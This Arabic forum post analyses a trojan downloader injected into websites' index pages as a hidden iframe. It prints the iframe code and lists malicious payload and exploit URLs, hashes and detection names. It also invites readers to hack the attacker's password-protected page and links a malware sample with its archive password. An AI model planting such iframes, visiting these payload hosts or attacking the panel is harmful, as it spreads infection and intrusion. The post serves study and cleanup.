السلام عليكم:
انتشر في الآونة الأخيرة ملف تروجان داونلودر تتم زراعته في صفحات الانديكس في الكثير من المواقع .
حيث تتم زراعة آي فريم iframe في الصفحة ضمن body . والآي فريم هو إطار مضمن في صفحة الويب ..
وهنا مخفي حيث أعطاه مبرمجة خاصية الاخفاء .. فلايظهر في الصفحة المصابة .. ويتم اكتشافه عن طريق أنتي فايروس .. أو عرض مصدر الصفحة
وهذا شكل الاطار المضمن الذي تتم زراعته :
كود PHP:
<i frame src='hxxp:// 81.95.149.28/logo/ index.php' width='1' height='1' style='visibility: hidden;'></i frame>
هذا الموقع صاحبه شاب برازيلي .. وهو يستخدم اكسبوليت Xploit اسمه Exploit.Multi.Qtp.b
لتتبع معلومات عن الموقع .. اذهب إلى قائمة ابدأ .. تشغيل .. واكتب فيه CMD ثم موافق
في سطر الأوامر اكتب
tracert 81.95.145.240
هل يعمل ؟
إذاً اذهب إلى هذه الصفحة :
hxxp://81.95.145.240/index.php
ستجد التالي في مصدرها:
كود PHP:
<form name="" action="index.php" method="post">
Password: <input name="pass" type="password" value=""><br>
<input type="submit" value="Send">
</form>
إنها صفحة محمية بكلمة مرور .. (( هل هنالك مخترق عربي يستطيع اختراقها ؟؟؟؟؟)) فقط كلمة مرور php >
المهم ..
هل تريد المزيد ؟ :
شغل برنامج مكافحة الفايروسات عندك .. ويفضل : Kasper internet security .. وتأكد أن Web Anti-Virus شغال ..
الآن اعمل الرابط كالآتي
كود PHP:
hxxp://81.95.145.240/go.php?sid=1
وتابع ...
سيأخذك الى هذه الصفحة .. ومن الرابط ستعرف ماهي :
كود PHP:
hxxp://81.95.145.241/_ot/ne.cgi?o6&a=702&p=admin&r=606868581
طبعاً .. صديقنا هذا يستخدم تروجان مكتوب بلغة جافا سكريبت .. أين خبراء الجافا ؟؟ ...
ماذا يفعل هذا التروجان داونلودر .. وماهو الملف الذي ينزله؟!
إنه الملف file.php وهو تروجان من نوع binary PE الموجود على موقعه على الرابط
كود PHP:
hxxp://81.95.145.240/logo/file.php
وقد أرفقت لكم الملف .. وقد قام صاحبه بتشفيره .. وقد أرفقت بغرض دراسته ونشر الفائدة عبر ايجاد الحلول الضادة له.
كلمة المرور لفتح الملف المضغوط هي firewall
وهذا ما قالته عنه برامج مكافحة الفايروسات وملفات التجسس :
AntiVir 7.4.0.32 06.05.2007 TR/Small.MI.25
AVG 7.5.0.467 06.05.2007 Generic4.SJO
BitDefender 7.2 06.05.2007 Trojan.Agent.AXB
DrWeb 4.33 06.05.2007 Trojan.DownLoader.23162
eSafe 7.0.15.0 06.05.2007 Win32.Small.mi
eTrust-Vet 30.7.3693 06.05.2007 Win32/Chepvil!generic
Ewido 4.0 06.05.2007 Trojan.Small.mi
F-Secure 6.70.13030.0 06.05.2007 Trojan.Win32.Small.mi
Ikarus T3.1.1.8 06.05.2007 Trojan.Win32.Small.mi
Kaspersky 4.0.2.24 06.05.2007 Trojan.Win32.Small.mi
Microsoft 1.2503 06.05.2007 TrojanDownloader:Win32/Agent!EF3C
Norman 5.80.02 06.05.2007 W32/Smalltroj.BHMK
Prevx1 V2 06.05.2007 Polynomial.Code.Exploit
Sophos 4.18.0 06.01.2007 Mal/Clagger-E
TheHacker 6.1.6.129 06.04.2007 Trojan/Small.mi
VirusBuster 4.3.23:9 06.05.2007 no virus found
Webwasher-Gateway 6.0.1 06.05.2007 Trojan.Small.MI.25
وعلى جهازي هذه النتيجة :
Kapsersky 7 :
detected: Trojan program Trojan-Downloader.JS.Agent.kd URL: hxxp://81.95.145.240/logo/index.php
detected: Trojan program Trojan-Downloader.JS.Agent.kd URL: hxxp://81.95.145.240/logo/index.php
detected: malware Exploit.Multi.Qtp.b URL: hxxp://81.95.145.241/_ot/ne.cgi?o6&a=702&p=admin&r=606868581
detected: Trojan program Trojan-Downloader.Win32.Small.evn URL: htxxp://81.95.145.240/logo/file.php
معلومات اضافية عن الملف :
حجم الملف : : 6767 bytes
MD5: 3cefdebc529c408c8ba9ef20a0b6291c
SHA1: 4d3599829828e90f6e27b886c9ee403163fc91f6
الحل الوحيد المعروف حاليا هو .. فتح كل ملفات الانديكس في الموقع المصاب .. وتحريرها بإزالة كود الآي فريم.
البحث عن الملف file.php أو آثاره وإزالتها ..
أما كيف يفعل هذا .. فالله أعلم .. ربما باستخدام تقنية تشبه كراولارات الياهو .. عناكب الياهو ..
والسؤال الآن ..
ماعلاقة ياهو بالموضوع ..؟؟!!
ربما نجد الإجابة
** ملاحظة مهمة : أستغرب من الكثيرين الذين أجابوا المتسائلين عن هذا الموضوع .. الشاطر يقول : السيرفر مخترق ..
طبعاً عرب وأجانب ..
يا ناس .. يا اخوان .. هذا الشخص لم يخترق أي سيرفر .. يعني شغلتو قاعد يزرع كودات آي فريم ؟!
وأنا أؤكد ذلك وأجزم به .. إنه يستخدم تقنية مختلفة .. جديدة .. محيّرة ..
ألف الحمد لله أن ملايين أدعياء الاختراق لايعرفونها .. وكل محبتي واحترامي إلى شخص اسمه FatalError
**
حاولت رفع الملف .. في المرفقات .. لكن . . المنتدى يقول لي .. تنسيق الملف غير صحيح ..
على كل .. هذا رابط رفعته عليه
http://www.filefactory.com/file/8d122c/
ملاحظة أخرى .. وضعت الموضوع كرد لي هنا .. والسبب تعلمه الادارة .. رغم أني أحببت أن يكون موضوعاً
وهو أحد مواضيعي على معهد روابط
مع المحبة والتقدير